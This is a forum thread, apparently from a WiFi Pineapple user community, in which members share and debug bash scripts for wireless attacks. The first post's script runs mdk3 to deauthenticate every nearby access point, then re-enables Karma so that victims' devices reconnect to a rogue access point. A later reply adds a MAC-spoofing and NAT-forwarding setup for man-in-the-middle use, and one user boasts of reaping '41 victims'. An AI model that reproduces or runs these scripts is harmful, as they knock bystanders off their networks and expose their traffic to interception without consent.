Foxtrot Posted February 22, 2013 Share Posted February 22, 2013 (edited) Hey guys! I am currently making a script that basically : -Asks for a MAC to avoid. -Asks how long to deauth for -Asks what interface to deauth on -Disables karma -Puts wlan0 into RFMON (Monitor Mode) -Starts MDK3 Deauthing for x amount of seconds inputted at the beginning -After x amount of seconds, Stops MDK3 -Removes mon0 -Starts karma again The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple, Allthough this can be done manually I thought a nice script would be nice that did it for you :) Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma , Incase it wasn't obvious, when I update the script, you have to the new code with the existing script you have... ***Module Development and further script development*** As suggested by some people, I have decided to take a go at developing a pineapple module that will automate 'attacks' such as the MDKarma script and other tricks I have planned from a UI, as well as flexibiltiy such as being able to edit the scripts to suit your needs without SSH'in into the pineapple to edit... I hope you all share your edits too and continue with feedback that helps add features :).... -------------------------------------------------------------------------------------------------------------------------------------- Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :) Edit : Version 1.2.3 - Added Whitelisiting. Please give some feedback and any improvements :) Code : #!/bin/bash #Part of the Pineapple Mojito Framework #Made by Foxtrot #Version 1.2.3 #Intro echo "!! This script is to be used only for legal, safe and authorised uses !!" echo "MDKarma V1.2.3" sleep 6 #Ask how long to deauth for echo -n "How long (In Seconds) to deauth for? : "; read deauthTime #Ask what Interface echo -n "What interface would you like to deauth on? : "; read deauthInterface #Ask if you want to whitelist read -r -p "Do you want to add a whitelist? [Y/n] " response if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]] then echo " " echo "Whitelist Created!" echo " " touch whitelist.txt read -r -p "MAC Address to add : " macaddr echo $macaddr >> whitelist.txt else echo " " echo "Avoiding Whitelist Creation!" echo " " fi #Put wlan0 up echo "Checking Interface wlan0 is up...." wifi sleep 3 #Stop Karma echo " " echo "Killing Karma...." hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null sleep 3 #Put deauthInterface into monitor mode echo " " echo "Putting $deauthInterface into monitor mode...." airmon-ng start $deauthInterface > /dev/null sleep 3 #Start deauthing with MDK3 and stop echo " " echo "Deauthing Access Points with MDK3...." mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 & sleep $deauthTime && killall mdk3 sleep 3 #Kill airmon-ng and start Karma again. echo "Removing mon0 and enabling karma...." airmon-ng stop mon0 > /dev/null wifi hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null sleep 3 #Finish echo " " echo "MDKarma Finished!" -Foxtrot Edited March 16, 2013 by Foxtrot Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 (edited) Nice!!!!!! I can run this script from Pineapple GIU? Edited February 22, 2013 by Boba Fett Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 22, 2013 Author Share Posted February 22, 2013 (edited) Edit : Basically, it won't run from a WPS script set with Whistle Masters 'button' module, because I plan to incorporate features that require user input. -Foxtrot Edited February 22, 2013 by Foxtrot Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 let me try it! Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 22, 2013 Author Share Posted February 22, 2013 let me try it! Thats why I posted it :p -Foxtrot Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 Doesnt works for me :-( Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 22, 2013 Author Share Posted February 22, 2013 Doesnt works for me :-( Would help if you included some more detail. It works fine for me. -Foxtrot Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 The script runs, but doesnt disconnect my imac, my windows 7 laptop or my Blackberry 9810. The remains connected. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 22, 2013 Author Share Posted February 22, 2013 (edited) The script runs, but doesnt disconnect my imac, my windows 7 laptop or my Blackberry 9810. The remains connected. Ah crap, replace the whole code in the .sh file you have with the one in the first post :) The problem is the time i set it to. I am working on getting it so you enter a time you want to deauth for, but bash is making me look like a fool haha If it still fails to deauth, increase the time in the sleep here mdk3 mon0 d & sleep 45 && killall mdk3 but on the script (Duh) -Foxtrot Edited February 22, 2013 by Foxtrot Quote Link to comment Share on other sites More sharing options...
Zephyr Posted February 22, 2013 Share Posted February 22, 2013 Nice!!!!!! I can run this script from Pineapple GIU? Not sure but I believe it may have been meant to be run as a startup script or via the WPS button. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 22, 2013 Author Share Posted February 22, 2013 Not sure but I believe it may have been meant to be run as a startup script or via the WPS button. Gah, Updated the first post with how to run it, should've put it there in the first place, Sorry! -Foxtrot Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 Weird, Now the script not run. Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 I´m running the script on the button (custom script 1) module. I increase the time on the script to 120 and nothing yet, cant get desauth on my devices. I dont know why :-( Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 This is my log: 22:03:10 Pineapple authpriv.info dropbear[3365]: Exit (root): Exited normally 22:01:22 Pineapple kern.info kernel: [ 1593.230000] br-lan: port 2(wlan0) entered forwarding state 22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state 22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state 22:01:20 Pineapple kern.info kernel: [ 1591.130000] device wlan0 entered promiscuous mode 22:01:19 Pineapple kern.info kernel: [ 1590.380000] device wlan0 left promiscuous mode 22:01:19 Pineapple kern.info kernel: [ 1590.380000] br-lan: port 2(wlan0) entered disabled state Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 22, 2013 Author Share Posted February 22, 2013 This is my log: 22:03:10 Pineapple authpriv.info dropbear[3365]: Exit (root): Exited normally 22:01:22 Pineapple kern.info kernel: [ 1593.230000] br-lan: port 2(wlan0) entered forwarding state 22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state 22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state 22:01:20 Pineapple kern.info kernel: [ 1591.130000] device wlan0 entered promiscuous mode 22:01:19 Pineapple kern.info kernel: [ 1590.380000] device wlan0 left promiscuous mode 22:01:19 Pineapple kern.info kernel: [ 1590.380000] br-lan: port 2(wlan0) entered disabled state Dude. I thought you meant you were running it from the Advanced section, I said i think it might run. It is meant to be run from SSH. -Foxtrot Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 22, 2013 Share Posted February 22, 2013 Ah ok. Let me try by ssh. It will be nice if runs with button option, for making a portable desauth. Quote Link to comment Share on other sites More sharing options...
Boba Fett Posted February 23, 2013 Share Posted February 23, 2013 Nothing. I run the script via ssh, the script run, but my imac, pc win 7 or blackberry et desauthenticate. Quote Link to comment Share on other sites More sharing options...
PineDominator Posted February 23, 2013 Share Posted February 23, 2013 Nothing. I run the script via ssh, the script run, but my imac, pc win 7 or blackberry et desauthenticate. Last July I made a setup script for mdk3 on the pineapple. I can dig it up if u you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT? Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 23, 2013 Author Share Posted February 23, 2013 Last July I made a setup script for mdk3 on the pineapple. I can dig it up if u you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT? hmmm. Strange it seems to d/c my laptop from my AP, but i can't do much testing as my antenna is broken atm ;(... I feel shame haha -Foxtrot Quote Link to comment Share on other sites More sharing options...
PineDominator Posted February 23, 2013 Share Posted February 23, 2013 #!/bin/sh airmon-ng start $1 ifconfig $1 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 & sleep 35 killall -9 mdk3 airmon-ng stop mon0 This script is designed to work with an external wifi adapter like the Alfa NHA I used this script after connecting my external adapter to a router for internet. #!/bin/sh #Change the Mac address of the usb wifi to something random. ifconfig $1 down macchanger -A $1 ifconfig $1 up #WPA2 - Let's assume we're going to connect to a WPA2 network wpa_supplicant -B -D nl80211 -i $1 -c /usb/wpa_supplicant.conf #WEP - Uncomment if you want to conect to a WEP network #iwconfig $1 mode managed key your_key_here #iwconfig $1 essid "your access point name here" #OPEN - Uncomment if you want to conect to a WEP network #iwconfig $1 essid "your access point name here" #Setup ipforwarding via iptables. echo 1 > /proc/sys/net/ipv4/ip_forward #Reset iptables #iptables -F #iptables -X iptables -A FORWARD -o $1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -jACCEPT iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE #Wait for 7 seconds to give enough time for association. sleep 7 #Grab an ip via DHCP udhcpc -i $1 the code above is to connect to a wireless router. now you can run the mdk3 script as such ./deauth.sh wlan1 wlan1 is the external wifi adapter already connected to a wireless access point the script will add the mac of wlan1 to a whitelist so mdk3 won't deauth it from the internet it then runs for 35 seconds, enough time to deauth all channels then it kills the process and disables the mon0 interface. Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted February 23, 2013 Author Share Posted February 23, 2013 Nice script petertfm! Kinda puts mine to shame. Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should... -Foxtrot Quote Link to comment Share on other sites More sharing options...
PineDominator Posted February 24, 2013 Share Posted February 24, 2013 (edited) Nice script petertfm! Kinda puts mine to shame. Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should... -Foxtrot Thanks. But you're script is still useful because it's killing hostapd and running on the internal wifi. When whistle master's button module was working I tied the wps button to the deauth script. Only thing I had to do was because mdk3 had been installed to my usb it needs a sym link to the internal folder location. My mk4 setup script now sym links all opkg packages installed to usb to the internal folder structure. Edited February 24, 2013 by petertfm Quote Link to comment Share on other sites More sharing options...
condor Posted February 24, 2013 Share Posted February 24, 2013 works great! first test reaped 41 victims. well done...and simple. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted February 24, 2013 Share Posted February 24, 2013 Thanks. But you're script is still useful because it's killing hostapd and running on the internal wifi. When whistle master's button module was working I tied the wps button to the deauth script. Only thing I had to do was because mdk3 had been installed to my usb it needs a sym link to the internal folder location. My mk4 setup script now sym links all opkg packages installed to usb to the internal folder structure. WPS button is indeed broken in last firmware version, this is why the button module is not working at the moment :( Quote Link to comment Share on other sites More sharing options...
PineDominator Posted February 24, 2013 Share Posted February 24, 2013 works great! first test reaped 41 victims. well done...and simple. Awesome :-) The one thing I would like to work on is save what monitor interface was created to a variable, instead of assuming mon0. Any thoughts on how to do this. Maybe grep and awk the out put from airmon-ng $1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.